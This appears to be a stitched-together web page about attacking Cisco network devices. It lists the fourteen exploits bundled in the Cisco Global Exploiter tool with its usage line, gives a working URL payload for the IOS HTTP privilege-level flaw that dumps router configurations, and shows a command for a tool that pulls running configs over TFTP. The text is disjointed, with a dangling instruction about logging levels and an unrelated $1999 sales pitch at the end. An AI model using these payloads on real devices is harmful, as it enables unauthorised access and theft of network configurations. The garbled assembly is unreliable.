Cisco Global Exploiter (CGE) CGE is an attempt to
combine all of the Cisco attacks into one tool.
perl cge.pl <target> <vulnerability
number>
Vulnerabilities list : [1] - Cisco 677/678 Telnet Buffer
Overflow Vulnerability [2] - Cisco IOS Router Denial of Service
Vulnerability [3] - Cisco IOS HTTP Auth Vulnerability [4] - Cisco IOS HTTP
Configuration Arbitrary Administrative Access Vulnerability [5] - Cisco
Catalyst SSH Protocol Mismatch Denial of Service Vulnerability [6] - Cisco
675 Web Administration Denial of Service Vulnerability [7] - Cisco Catalyst
3500 XL Remote Arbitrary Command Vulnerability [8] - Cisco IOS Software HTTP
Request Denial of Service Vulnerability [9] - Cisco 514 UDP Flood Denial of
Service Vulnerability [10] - CiscoSecure ACS for Windows NT Server Denial of
Service Vulnerability [11] - Cisco Catalyst Memory Leak Vulnerability [12]
- Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability [13] - 0
Encoding IDS Bypass Vulnerability (UTF) [14] - Cisco IOS HTTP Denial of
Service Vulnerability
HTTP Arbitrary Access vulnerability
A common security flaw (of its time!) was/is the HTTP Arbitrary Access vulnerability. This flaw allowed an external attacker to execute router commands via the web interface.
Cisco devices have a number of privilege levels, these levels start at 0 (User
EXEC) and go up to 100, although mostly only the first 15 are used. Level 15 is
Privileged EXEC mode, the same as enable mode.
By referring to these
levels within the URL of the target device, an attacker could pass commands to
the router and have them execute in Privilege EXEC mode.
Web browse to the Cisco device:
http://<IP>
Click cancel to the logon box and enter the following
address: http://<IP>/level/99/exec/show/config
You may have to
scroll through all of the levels from 16-99 for this to work.
To raise the logging level to only log emergencies:
CLI tool that automatically scrolls through all available privilege levels to identify if any are vulnerable to this attack, this tool is called ios-w3-vuln (although it may have other names.) As well as identifying the vulnerable level, ios-w3-vuln will also attempt to TFTP download the running.config file to a TFTP server running locally.
./ios-w3-vul 192.168.1.1 fetch >
/tmp/router.txt
To receive your CISCO Vulnerability Assessment , please submit your payment of $1999.00 If more than 100 miles of travel will be required, the additional cost will be billed separatelly.